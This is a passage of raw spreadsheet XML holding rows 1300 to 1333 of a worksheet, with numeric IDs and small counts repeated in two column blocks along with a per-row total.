      <c r="K1300" s="7">
        <v>5172</v>
      </c>
      <c r="L1300" s="8">
        <v>7</v>
      </c>
      <c r="M1300" s="8">
        <v>0</v>
      </c>
      <c r="N1300" s="8">
        <v>1</v>
      </c>
      <c r="O1300" s="8">
        <v>4</v>
      </c>
      <c r="P1300" s="8">
        <v>1</v>
      </c>
      <c r="Q1300" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1301" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1301" s="7">
        <v>5175</v>
      </c>
      <c r="B1301" s="8">
        <v>24</v>
      </c>
      <c r="C1301" s="8">
        <v>2</v>
      </c>
      <c r="D1301" s="8">
        <v>30</v>
      </c>
      <c r="E1301" s="8">
        <v>15</v>
      </c>
      <c r="F1301" s="8">
        <v>4</v>
      </c>
      <c r="G1301" s="8">
        <v>1</v>
      </c>
      <c r="H1301" s="8">
        <v>76</v>
      </c>
      <c r="K1301" s="7">
        <v>5175</v>
      </c>
      <c r="L1301" s="8">
        <v>24</v>
      </c>
      <c r="M1301" s="8">
        <v>2</v>
      </c>
      <c r="N1301" s="8">
        <v>30</v>
      </c>
      <c r="O1301" s="8">
        <v>15</v>
      </c>
      <c r="P1301" s="8">
        <v>4</v>
      </c>
      <c r="Q1301" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1302" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1302" s="7">
        <v>5179</v>
      </c>
      <c r="B1302" s="8">
        <v>25</v>
      </c>
      <c r="C1302" s="8">
        <v>1</v>
      </c>
      <c r="D1302" s="8">
        <v>3</v>
      </c>
      <c r="E1302" s="8">
        <v>2</v>
      </c>
      <c r="F1302" s="8">
        <v>29</v>
      </c>
      <c r="G1302" s="8">
        <v>29</v>
      </c>
      <c r="H1302" s="8">
        <v>89</v>
      </c>
      <c r="K1302" s="7">
        <v>5179</v>
      </c>
      <c r="L1302" s="8">
        <v>25</v>
      </c>
      <c r="M1302" s="8">
        <v>1</v>
      </c>
      <c r="N1302" s="8">
        <v>3</v>
      </c>
      <c r="O1302" s="8">
        <v>2</v>
      </c>
      <c r="P1302" s="8">
        <v>29</v>
      </c>
      <c r="Q1302" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="1303" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1303" s="7">
        <v>5182</v>
      </c>
      <c r="B1303" s="8">
        <v>6</v>
      </c>
      <c r="C1303" s="8">
        <v>1</v>
      </c>
      <c r="D1303" s="8">
        <v>0</v>
      </c>
      <c r="E1303" s="8">
        <v>0</v>
      </c>
      <c r="F1303" s="8">
        <v>0</v>
      </c>
      <c r="G1303" s="8">
        <v>5</v>
      </c>
      <c r="H1303" s="8">
        <v>12</v>
      </c>
      <c r="K1303" s="7">
        <v>5182</v>
      </c>
      <c r="L1303" s="8">
        <v>6</v>
      </c>
      <c r="M1303" s="8">
        <v>1</v>
      </c>
      <c r="N1303" s="8">
        <v>0</v>
      </c>
      <c r="O1303" s="8">
        <v>0</v>
      </c>
      <c r="P1303" s="8">
        <v>0</v>
      </c>
      <c r="Q1303" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1304" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1304" s="7">
        <v>5183</v>
      </c>
      <c r="B1304" s="8">
        <v>26</v>
      </c>
      <c r="C1304" s="8">
        <v>2</v>
      </c>
      <c r="D1304" s="8">
        <v>0</v>
      </c>
      <c r="E1304" s="8">
        <v>0</v>
      </c>
      <c r="F1304" s="8">
        <v>20</v>
      </c>
      <c r="G1304" s="8">
        <v>2</v>
      </c>
      <c r="H1304" s="8">
        <v>50</v>
      </c>
      <c r="K1304" s="7">
        <v>5183</v>
      </c>
      <c r="L1304" s="8">
        <v>26</v>
      </c>
      <c r="M1304" s="8">
        <v>2</v>
      </c>
      <c r="N1304" s="8">
        <v>0</v>
      </c>
      <c r="O1304" s="8">
        <v>0</v>
      </c>
      <c r="P1304" s="8">
        <v>20</v>
      </c>
      <c r="Q1304" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1305" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1305" s="7">
        <v>5189</v>
      </c>
      <c r="B1305" s="8">
        <v>6</v>
      </c>
      <c r="C1305" s="8">
        <v>1</v>
      </c>
      <c r="D1305" s="8">
        <v>11</v>
      </c>
      <c r="E1305" s="8">
        <v>6</v>
      </c>
      <c r="F1305" s="8">
        <v>9</v>
      </c>
      <c r="G1305" s="8">
        <v>4</v>
      </c>
      <c r="H1305" s="8">
        <v>37</v>
      </c>
      <c r="K1305" s="7">
        <v>5189</v>
      </c>
      <c r="L1305" s="8">
        <v>6</v>
      </c>
      <c r="M1305" s="8">
        <v>1</v>
      </c>
      <c r="N1305" s="8">
        <v>11</v>
      </c>
      <c r="O1305" s="8">
        <v>6</v>
      </c>
      <c r="P1305" s="8">
        <v>9</v>
      </c>
      <c r="Q1305" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1306" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1306" s="7">
        <v>5190</v>
      </c>
      <c r="B1306" s="8">
        <v>26</v>
      </c>
      <c r="C1306" s="8">
        <v>1</v>
      </c>
      <c r="D1306" s="8">
        <v>3</v>
      </c>
      <c r="E1306" s="8">
        <v>2</v>
      </c>
      <c r="F1306" s="8">
        <v>10</v>
      </c>
      <c r="G1306" s="8">
        <v>2</v>
      </c>
      <c r="H1306" s="8">
        <v>44</v>
      </c>
      <c r="K1306" s="7">
        <v>5190</v>
      </c>
      <c r="L1306" s="8">
        <v>26</v>
      </c>
      <c r="M1306" s="8">
        <v>1</v>
      </c>
      <c r="N1306" s="8">
        <v>3</v>
      </c>
      <c r="O1306" s="8">
        <v>2</v>
      </c>
      <c r="P1306" s="8">
        <v>10</v>
      </c>
      <c r="Q1306" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1307" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1307" s="7">
        <v>5191</v>
      </c>
      <c r="B1307" s="8">
        <v>20</v>
      </c>
      <c r="C1307" s="8">
        <v>1</v>
      </c>
      <c r="D1307" s="8">
        <v>0</v>
      </c>
      <c r="E1307" s="8">
        <v>0</v>
      </c>
      <c r="F1307" s="8">
        <v>112</v>
      </c>
      <c r="G1307" s="8">
        <v>38</v>
      </c>
      <c r="H1307" s="8">
        <v>171</v>
      </c>
      <c r="K1307" s="7">
        <v>5191</v>
      </c>
      <c r="L1307" s="8">
        <v>20</v>
      </c>
      <c r="M1307" s="8">
        <v>1</v>
      </c>
      <c r="N1307" s="8">
        <v>0</v>
      </c>
      <c r="O1307" s="8">
        <v>0</v>
      </c>
      <c r="P1307" s="8">
        <v>112</v>
      </c>
      <c r="Q1307" s="8">
        <v>38</v>
      </c>
    </row>
    <row r="1308" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1308" s="7">
        <v>5193</v>
      </c>
      <c r="B1308" s="8">
        <v>20</v>
      </c>
      <c r="C1308" s="8">
        <v>0</v>
      </c>
      <c r="D1308" s="8">
        <v>0</v>
      </c>
      <c r="E1308" s="8">
        <v>0</v>
      </c>
      <c r="F1308" s="8">
        <v>7</v>
      </c>
      <c r="G1308" s="8">
        <v>0</v>
      </c>
      <c r="H1308" s="8">
        <v>27</v>
      </c>
      <c r="K1308" s="7">
        <v>5193</v>
      </c>
      <c r="L1308" s="8">
        <v>20</v>
      </c>
      <c r="M1308" s="8">
        <v>0</v>
      </c>
      <c r="N1308" s="8">
        <v>0</v>
      </c>
      <c r="O1308" s="8">
        <v>0</v>
      </c>
      <c r="P1308" s="8">
        <v>7</v>
      </c>
      <c r="Q1308" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1309" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1309" s="7">
        <v>5194</v>
      </c>
      <c r="B1309" s="8">
        <v>20</v>
      </c>
      <c r="C1309" s="8">
        <v>0</v>
      </c>
      <c r="D1309" s="8">
        <v>0</v>
      </c>
      <c r="E1309" s="8">
        <v>0</v>
      </c>
      <c r="F1309" s="8">
        <v>7</v>
      </c>
      <c r="G1309" s="8">
        <v>0</v>
      </c>
      <c r="H1309" s="8">
        <v>27</v>
      </c>
      <c r="K1309" s="7">
        <v>5194</v>
      </c>
      <c r="L1309" s="8">
        <v>20</v>
      </c>
      <c r="M1309" s="8">
        <v>0</v>
      </c>
      <c r="N1309" s="8">
        <v>0</v>
      </c>
      <c r="O1309" s="8">
        <v>0</v>
      </c>
      <c r="P1309" s="8">
        <v>7</v>
      </c>
      <c r="Q1309" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1310" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1310" s="7">
        <v>5195</v>
      </c>
      <c r="B1310" s="8">
        <v>14</v>
      </c>
      <c r="C1310" s="8">
        <v>1</v>
      </c>
      <c r="D1310" s="8">
        <v>0</v>
      </c>
      <c r="E1310" s="8">
        <v>0</v>
      </c>
      <c r="F1310" s="8">
        <v>5</v>
      </c>
      <c r="G1310" s="8">
        <v>1</v>
      </c>
      <c r="H1310" s="8">
        <v>21</v>
      </c>
      <c r="K1310" s="7">
        <v>5195</v>
      </c>
      <c r="L1310" s="8">
        <v>14</v>
      </c>
      <c r="M1310" s="8">
        <v>1</v>
      </c>
      <c r="N1310" s="8">
        <v>0</v>
      </c>
      <c r="O1310" s="8">
        <v>0</v>
      </c>
      <c r="P1310" s="8">
        <v>5</v>
      </c>
      <c r="Q1310" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1311" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1311" s="7">
        <v>5197</v>
      </c>
      <c r="B1311" s="8">
        <v>26</v>
      </c>
      <c r="C1311" s="8">
        <v>0</v>
      </c>
      <c r="D1311" s="8">
        <v>0</v>
      </c>
      <c r="E1311" s="8">
        <v>0</v>
      </c>
      <c r="F1311" s="8">
        <v>10</v>
      </c>
      <c r="G1311" s="8">
        <v>3</v>
      </c>
      <c r="H1311" s="8">
        <v>39</v>
      </c>
      <c r="K1311" s="7">
        <v>5197</v>
      </c>
      <c r="L1311" s="8">
        <v>26</v>
      </c>
      <c r="M1311" s="8">
        <v>0</v>
      </c>
      <c r="N1311" s="8">
        <v>0</v>
      </c>
      <c r="O1311" s="8">
        <v>0</v>
      </c>
      <c r="P1311" s="8">
        <v>10</v>
      </c>
      <c r="Q1311" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1312" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1312" s="7">
        <v>5200</v>
      </c>
      <c r="B1312" s="8">
        <v>25</v>
      </c>
      <c r="C1312" s="8">
        <v>0</v>
      </c>
      <c r="D1312" s="8">
        <v>70</v>
      </c>
      <c r="E1312" s="8">
        <v>9</v>
      </c>
      <c r="F1312" s="8">
        <v>20</v>
      </c>
      <c r="G1312" s="8">
        <v>18</v>
      </c>
      <c r="H1312" s="8">
        <v>142</v>
      </c>
      <c r="K1312" s="7">
        <v>5200</v>
      </c>
      <c r="L1312" s="8">
        <v>25</v>
      </c>
      <c r="M1312" s="8">
        <v>0</v>
      </c>
      <c r="N1312" s="8">
        <v>70</v>
      </c>
      <c r="O1312" s="8">
        <v>9</v>
      </c>
      <c r="P1312" s="8">
        <v>20</v>
      </c>
      <c r="Q1312" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="1313" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1313" s="7">
        <v>5202</v>
      </c>
      <c r="B1313" s="8">
        <v>6</v>
      </c>
      <c r="C1313" s="8">
        <v>1</v>
      </c>
      <c r="D1313" s="8">
        <v>5</v>
      </c>
      <c r="E1313" s="8">
        <v>20</v>
      </c>
      <c r="F1313" s="8">
        <v>4</v>
      </c>
      <c r="G1313" s="8">
        <v>0</v>
      </c>
      <c r="H1313" s="8">
        <v>36</v>
      </c>
      <c r="K1313" s="7">
        <v>5202</v>
      </c>
      <c r="L1313" s="8">
        <v>6</v>
      </c>
      <c r="M1313" s="8">
        <v>1</v>
      </c>
      <c r="N1313" s="8">
        <v>5</v>
      </c>
      <c r="O1313" s="8">
        <v>20</v>
      </c>
      <c r="P1313" s="8">
        <v>4</v>
      </c>
      <c r="Q1313" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1314" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1314" s="7">
        <v>5203</v>
      </c>
      <c r="B1314" s="8">
        <v>26</v>
      </c>
      <c r="C1314" s="8">
        <v>2</v>
      </c>
      <c r="D1314" s="8">
        <v>2</v>
      </c>
      <c r="E1314" s="8">
        <v>6</v>
      </c>
      <c r="F1314" s="8">
        <v>3</v>
      </c>
      <c r="G1314" s="8">
        <v>8</v>
      </c>
      <c r="H1314" s="8">
        <v>47</v>
      </c>
      <c r="K1314" s="7">
        <v>5203</v>
      </c>
      <c r="L1314" s="8">
        <v>26</v>
      </c>
      <c r="M1314" s="8">
        <v>2</v>
      </c>
      <c r="N1314" s="8">
        <v>2</v>
      </c>
      <c r="O1314" s="8">
        <v>6</v>
      </c>
      <c r="P1314" s="8">
        <v>3</v>
      </c>
      <c r="Q1314" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1315" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1315" s="7">
        <v>5204</v>
      </c>
      <c r="B1315" s="8">
        <v>20</v>
      </c>
      <c r="C1315" s="8">
        <v>0</v>
      </c>
      <c r="D1315" s="8">
        <v>0</v>
      </c>
      <c r="E1315" s="8">
        <v>0</v>
      </c>
      <c r="F1315" s="8">
        <v>9</v>
      </c>
      <c r="G1315" s="8">
        <v>2</v>
      </c>
      <c r="H1315" s="8">
        <v>31</v>
      </c>
      <c r="K1315" s="7">
        <v>5204</v>
      </c>
      <c r="L1315" s="8">
        <v>20</v>
      </c>
      <c r="M1315" s="8">
        <v>0</v>
      </c>
      <c r="N1315" s="8">
        <v>0</v>
      </c>
      <c r="O1315" s="8">
        <v>0</v>
      </c>
      <c r="P1315" s="8">
        <v>9</v>
      </c>
      <c r="Q1315" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1316" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1316" s="7">
        <v>5205</v>
      </c>
      <c r="B1316" s="8">
        <v>26</v>
      </c>
      <c r="C1316" s="8">
        <v>1</v>
      </c>
      <c r="D1316" s="8">
        <v>7</v>
      </c>
      <c r="E1316" s="8">
        <v>0</v>
      </c>
      <c r="F1316" s="8">
        <v>2</v>
      </c>
      <c r="G1316" s="8">
        <v>1</v>
      </c>
      <c r="H1316" s="8">
        <v>37</v>
      </c>
      <c r="K1316" s="7">
        <v>5205</v>
      </c>
      <c r="L1316" s="8">
        <v>26</v>
      </c>
      <c r="M1316" s="8">
        <v>1</v>
      </c>
      <c r="N1316" s="8">
        <v>7</v>
      </c>
      <c r="O1316" s="8">
        <v>0</v>
      </c>
      <c r="P1316" s="8">
        <v>2</v>
      </c>
      <c r="Q1316" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1317" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1317" s="7">
        <v>5211</v>
      </c>
      <c r="B1317" s="8">
        <v>22</v>
      </c>
      <c r="C1317" s="8">
        <v>1</v>
      </c>
      <c r="D1317" s="8">
        <v>1</v>
      </c>
      <c r="E1317" s="8">
        <v>0</v>
      </c>
      <c r="F1317" s="8">
        <v>2</v>
      </c>
      <c r="G1317" s="8">
        <v>3</v>
      </c>
      <c r="H1317" s="8">
        <v>29</v>
      </c>
      <c r="K1317" s="7">
        <v>5211</v>
      </c>
      <c r="L1317" s="8">
        <v>22</v>
      </c>
      <c r="M1317" s="8">
        <v>1</v>
      </c>
      <c r="N1317" s="8">
        <v>1</v>
      </c>
      <c r="O1317" s="8">
        <v>0</v>
      </c>
      <c r="P1317" s="8">
        <v>2</v>
      </c>
      <c r="Q1317" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1318" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1318" s="7">
        <v>5216</v>
      </c>
      <c r="B1318" s="8">
        <v>24</v>
      </c>
      <c r="C1318" s="8">
        <v>1</v>
      </c>
      <c r="D1318" s="8">
        <v>0</v>
      </c>
      <c r="E1318" s="8">
        <v>0</v>
      </c>
      <c r="F1318" s="8">
        <v>7</v>
      </c>
      <c r="G1318" s="8">
        <v>2</v>
      </c>
      <c r="H1318" s="8">
        <v>34</v>
      </c>
      <c r="K1318" s="7">
        <v>5216</v>
      </c>
      <c r="L1318" s="8">
        <v>24</v>
      </c>
      <c r="M1318" s="8">
        <v>1</v>
      </c>
      <c r="N1318" s="8">
        <v>0</v>
      </c>
      <c r="O1318" s="8">
        <v>0</v>
      </c>
      <c r="P1318" s="8">
        <v>7</v>
      </c>
      <c r="Q1318" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1319" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1319" s="7">
        <v>5218</v>
      </c>
      <c r="B1319" s="8">
        <v>6</v>
      </c>
      <c r="C1319" s="8">
        <v>1</v>
      </c>
      <c r="D1319" s="8">
        <v>0</v>
      </c>
      <c r="E1319" s="8">
        <v>0</v>
      </c>
      <c r="F1319" s="8">
        <v>18</v>
      </c>
      <c r="G1319" s="8">
        <v>18</v>
      </c>
      <c r="H1319" s="8">
        <v>43</v>
      </c>
      <c r="K1319" s="7">
        <v>5218</v>
      </c>
      <c r="L1319" s="8">
        <v>6</v>
      </c>
      <c r="M1319" s="8">
        <v>1</v>
      </c>
      <c r="N1319" s="8">
        <v>0</v>
      </c>
      <c r="O1319" s="8">
        <v>0</v>
      </c>
      <c r="P1319" s="8">
        <v>18</v>
      </c>
      <c r="Q1319" s="8">
        <v>18</v>
      </c>
    </row>
    <row r="1320" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1320" s="7">
        <v>5219</v>
      </c>
      <c r="B1320" s="8">
        <v>25</v>
      </c>
      <c r="C1320" s="8">
        <v>1</v>
      </c>
      <c r="D1320" s="8">
        <v>0</v>
      </c>
      <c r="E1320" s="8">
        <v>0</v>
      </c>
      <c r="F1320" s="8">
        <v>16</v>
      </c>
      <c r="G1320" s="8">
        <v>2</v>
      </c>
      <c r="H1320" s="8">
        <v>44</v>
      </c>
      <c r="K1320" s="7">
        <v>5219</v>
      </c>
      <c r="L1320" s="8">
        <v>25</v>
      </c>
      <c r="M1320" s="8">
        <v>1</v>
      </c>
      <c r="N1320" s="8">
        <v>0</v>
      </c>
      <c r="O1320" s="8">
        <v>0</v>
      </c>
      <c r="P1320" s="8">
        <v>16</v>
      </c>
      <c r="Q1320" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1321" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1321" s="7">
        <v>5220</v>
      </c>
      <c r="B1321" s="8">
        <v>25</v>
      </c>
      <c r="C1321" s="8">
        <v>1</v>
      </c>
      <c r="D1321" s="8">
        <v>0</v>
      </c>
      <c r="E1321" s="8">
        <v>3</v>
      </c>
      <c r="F1321" s="8">
        <v>6</v>
      </c>
      <c r="G1321" s="8">
        <v>9</v>
      </c>
      <c r="H1321" s="8">
        <v>44</v>
      </c>
      <c r="K1321" s="7">
        <v>5220</v>
      </c>
      <c r="L1321" s="8">
        <v>25</v>
      </c>
      <c r="M1321" s="8">
        <v>1</v>
      </c>
      <c r="N1321" s="8">
        <v>0</v>
      </c>
      <c r="O1321" s="8">
        <v>3</v>
      </c>
      <c r="P1321" s="8">
        <v>6</v>
      </c>
      <c r="Q1321" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="1322" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1322" s="7">
        <v>5221</v>
      </c>
      <c r="B1322" s="8">
        <v>28</v>
      </c>
      <c r="C1322" s="8">
        <v>0</v>
      </c>
      <c r="D1322" s="8">
        <v>3</v>
      </c>
      <c r="E1322" s="8">
        <v>2</v>
      </c>
      <c r="F1322" s="8">
        <v>1</v>
      </c>
      <c r="G1322" s="8">
        <v>1</v>
      </c>
      <c r="H1322" s="8">
        <v>35</v>
      </c>
      <c r="K1322" s="7">
        <v>5221</v>
      </c>
      <c r="L1322" s="8">
        <v>28</v>
      </c>
      <c r="M1322" s="8">
        <v>0</v>
      </c>
      <c r="N1322" s="8">
        <v>3</v>
      </c>
      <c r="O1322" s="8">
        <v>2</v>
      </c>
      <c r="P1322" s="8">
        <v>1</v>
      </c>
      <c r="Q1322" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1323" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1323" s="7">
        <v>5222</v>
      </c>
      <c r="B1323" s="8">
        <v>25</v>
      </c>
      <c r="C1323" s="8">
        <v>25</v>
      </c>
      <c r="D1323" s="8">
        <v>2</v>
      </c>
      <c r="E1323" s="8">
        <v>2</v>
      </c>
      <c r="F1323" s="8">
        <v>3</v>
      </c>
      <c r="G1323" s="8">
        <v>1</v>
      </c>
      <c r="H1323" s="8">
        <v>58</v>
      </c>
      <c r="K1323" s="7">
        <v>5222</v>
      </c>
      <c r="L1323" s="8">
        <v>25</v>
      </c>
      <c r="M1323" s="8">
        <v>25</v>
      </c>
      <c r="N1323" s="8">
        <v>2</v>
      </c>
      <c r="O1323" s="8">
        <v>2</v>
      </c>
      <c r="P1323" s="8">
        <v>3</v>
      </c>
      <c r="Q1323" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1324" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1324" s="7">
        <v>5223</v>
      </c>
      <c r="B1324" s="8">
        <v>6</v>
      </c>
      <c r="C1324" s="8">
        <v>0</v>
      </c>
      <c r="D1324" s="8">
        <v>6</v>
      </c>
      <c r="E1324" s="8">
        <v>0</v>
      </c>
      <c r="F1324" s="8">
        <v>0</v>
      </c>
      <c r="G1324" s="8">
        <v>1</v>
      </c>
      <c r="H1324" s="8">
        <v>13</v>
      </c>
      <c r="K1324" s="7">
        <v>5223</v>
      </c>
      <c r="L1324" s="8">
        <v>6</v>
      </c>
      <c r="M1324" s="8">
        <v>0</v>
      </c>
      <c r="N1324" s="8">
        <v>6</v>
      </c>
      <c r="O1324" s="8">
        <v>0</v>
      </c>
      <c r="P1324" s="8">
        <v>0</v>
      </c>
      <c r="Q1324" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1325" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1325" s="7">
        <v>5228</v>
      </c>
      <c r="B1325" s="8">
        <v>26</v>
      </c>
      <c r="C1325" s="8">
        <v>0</v>
      </c>
      <c r="D1325" s="8">
        <v>0</v>
      </c>
      <c r="E1325" s="8">
        <v>5</v>
      </c>
      <c r="F1325" s="8">
        <v>17</v>
      </c>
      <c r="G1325" s="8">
        <v>1</v>
      </c>
      <c r="H1325" s="8">
        <v>49</v>
      </c>
      <c r="K1325" s="7">
        <v>5228</v>
      </c>
      <c r="L1325" s="8">
        <v>26</v>
      </c>
      <c r="M1325" s="8">
        <v>0</v>
      </c>
      <c r="N1325" s="8">
        <v>0</v>
      </c>
      <c r="O1325" s="8">
        <v>5</v>
      </c>
      <c r="P1325" s="8">
        <v>17</v>
      </c>
      <c r="Q1325" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1326" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1326" s="7">
        <v>5232</v>
      </c>
      <c r="B1326" s="8">
        <v>30</v>
      </c>
      <c r="C1326" s="8">
        <v>0</v>
      </c>
      <c r="D1326" s="8">
        <v>0</v>
      </c>
      <c r="E1326" s="8">
        <v>0</v>
      </c>
      <c r="F1326" s="8">
        <v>2</v>
      </c>
      <c r="G1326" s="8">
        <v>5</v>
      </c>
      <c r="H1326" s="8">
        <v>37</v>
      </c>
      <c r="K1326" s="7">
        <v>5232</v>
      </c>
      <c r="L1326" s="8">
        <v>30</v>
      </c>
      <c r="M1326" s="8">
        <v>0</v>
      </c>
      <c r="N1326" s="8">
        <v>0</v>
      </c>
      <c r="O1326" s="8">
        <v>0</v>
      </c>
      <c r="P1326" s="8">
        <v>2</v>
      </c>
      <c r="Q1326" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1327" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1327" s="7">
        <v>5234</v>
      </c>
      <c r="B1327" s="8">
        <v>6</v>
      </c>
      <c r="C1327" s="8">
        <v>1</v>
      </c>
      <c r="D1327" s="8">
        <v>9</v>
      </c>
      <c r="E1327" s="8">
        <v>1</v>
      </c>
      <c r="F1327" s="8">
        <v>15</v>
      </c>
      <c r="G1327" s="8">
        <v>5</v>
      </c>
      <c r="H1327" s="8">
        <v>37</v>
      </c>
      <c r="K1327" s="7">
        <v>5234</v>
      </c>
      <c r="L1327" s="8">
        <v>6</v>
      </c>
      <c r="M1327" s="8">
        <v>1</v>
      </c>
      <c r="N1327" s="8">
        <v>9</v>
      </c>
      <c r="O1327" s="8">
        <v>1</v>
      </c>
      <c r="P1327" s="8">
        <v>15</v>
      </c>
      <c r="Q1327" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1328" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1328" s="7">
        <v>5237</v>
      </c>
      <c r="B1328" s="8">
        <v>26</v>
      </c>
      <c r="C1328" s="8">
        <v>0</v>
      </c>
      <c r="D1328" s="8">
        <v>4</v>
      </c>
      <c r="E1328" s="8">
        <v>0</v>
      </c>
      <c r="F1328" s="8">
        <v>5</v>
      </c>
      <c r="G1328" s="8">
        <v>3</v>
      </c>
      <c r="H1328" s="8">
        <v>38</v>
      </c>
      <c r="K1328" s="7">
        <v>5237</v>
      </c>
      <c r="L1328" s="8">
        <v>26</v>
      </c>
      <c r="M1328" s="8">
        <v>0</v>
      </c>
      <c r="N1328" s="8">
        <v>4</v>
      </c>
      <c r="O1328" s="8">
        <v>0</v>
      </c>
      <c r="P1328" s="8">
        <v>5</v>
      </c>
      <c r="Q1328" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1329" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1329" s="7">
        <v>5238</v>
      </c>
      <c r="B1329" s="8">
        <v>5</v>
      </c>
      <c r="C1329" s="8">
        <v>1</v>
      </c>
      <c r="D1329" s="8">
        <v>0</v>
      </c>
      <c r="E1329" s="8">
        <v>0</v>
      </c>
      <c r="F1329" s="8">
        <v>2</v>
      </c>
      <c r="G1329" s="8">
        <v>1</v>
      </c>
      <c r="H1329" s="8">
        <v>9</v>
      </c>
      <c r="K1329" s="7">
        <v>5238</v>
      </c>
      <c r="L1329" s="8">
        <v>5</v>
      </c>
      <c r="M1329" s="8">
        <v>1</v>
      </c>
      <c r="N1329" s="8">
        <v>0</v>
      </c>
      <c r="O1329" s="8">
        <v>0</v>
      </c>
      <c r="P1329" s="8">
        <v>2</v>
      </c>
      <c r="Q1329" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1330" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1330" s="7">
        <v>5240</v>
      </c>
      <c r="B1330" s="8">
        <v>25</v>
      </c>
      <c r="C1330" s="8">
        <v>0</v>
      </c>
      <c r="D1330" s="8">
        <v>11</v>
      </c>
      <c r="E1330" s="8">
        <v>31</v>
      </c>
      <c r="F1330" s="8">
        <v>2</v>
      </c>
      <c r="G1330" s="8">
        <v>1</v>
      </c>
      <c r="H1330" s="8">
        <v>70</v>
      </c>
      <c r="K1330" s="7">
        <v>5240</v>
      </c>
      <c r="L1330" s="8">
        <v>25</v>
      </c>
      <c r="M1330" s="8">
        <v>0</v>
      </c>
      <c r="N1330" s="8">
        <v>11</v>
      </c>
      <c r="O1330" s="8">
        <v>31</v>
      </c>
      <c r="P1330" s="8">
        <v>2</v>
      </c>
      <c r="Q1330" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1331" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1331" s="7">
        <v>5242</v>
      </c>
      <c r="B1331" s="8">
        <v>30</v>
      </c>
      <c r="C1331" s="8">
        <v>1</v>
      </c>
      <c r="D1331" s="8">
        <v>3</v>
      </c>
      <c r="E1331" s="8">
        <v>5</v>
      </c>
      <c r="F1331" s="8">
        <v>2</v>
      </c>
      <c r="G1331" s="8">
        <v>0</v>
      </c>
      <c r="H1331" s="8">
        <v>41</v>
      </c>
      <c r="K1331" s="7">
        <v>5242</v>
      </c>
      <c r="L1331" s="8">
        <v>30</v>
      </c>
      <c r="M1331" s="8">
        <v>1</v>
      </c>
      <c r="N1331" s="8">
        <v>3</v>
      </c>
      <c r="O1331" s="8">
        <v>5</v>
      </c>
      <c r="P1331" s="8">
        <v>2</v>
      </c>
      <c r="Q1331" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1332" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1332" s="7">
        <v>5244</v>
      </c>
      <c r="B1332" s="8">
        <v>30</v>
      </c>
      <c r="C1332" s="8">
        <v>30</v>
      </c>
      <c r="D1332" s="8">
        <v>1</v>
      </c>
      <c r="E1332" s="8">
        <v>0</v>
      </c>
      <c r="F1332" s="8">
        <v>4</v>
      </c>
      <c r="G1332" s="8">
        <v>1</v>
      </c>
      <c r="H1332" s="8">
        <v>66</v>
      </c>
      <c r="K1332" s="7">
        <v>5244</v>
      </c>
      <c r="L1332" s="8">
        <v>30</v>
      </c>
      <c r="M1332" s="8">
        <v>30</v>
      </c>
      <c r="N1332" s="8">
        <v>1</v>
      </c>
      <c r="O1332" s="8">
        <v>0</v>
      </c>
      <c r="P1332" s="8">
        <v>4</v>
      </c>
      <c r="Q1332" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1333" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1333" s="7">
        <v>5247</v>
      </c>
      <c r="B1333" s="8">
        <v>26</v>
      </c>
      <c r="C1333" s="8">
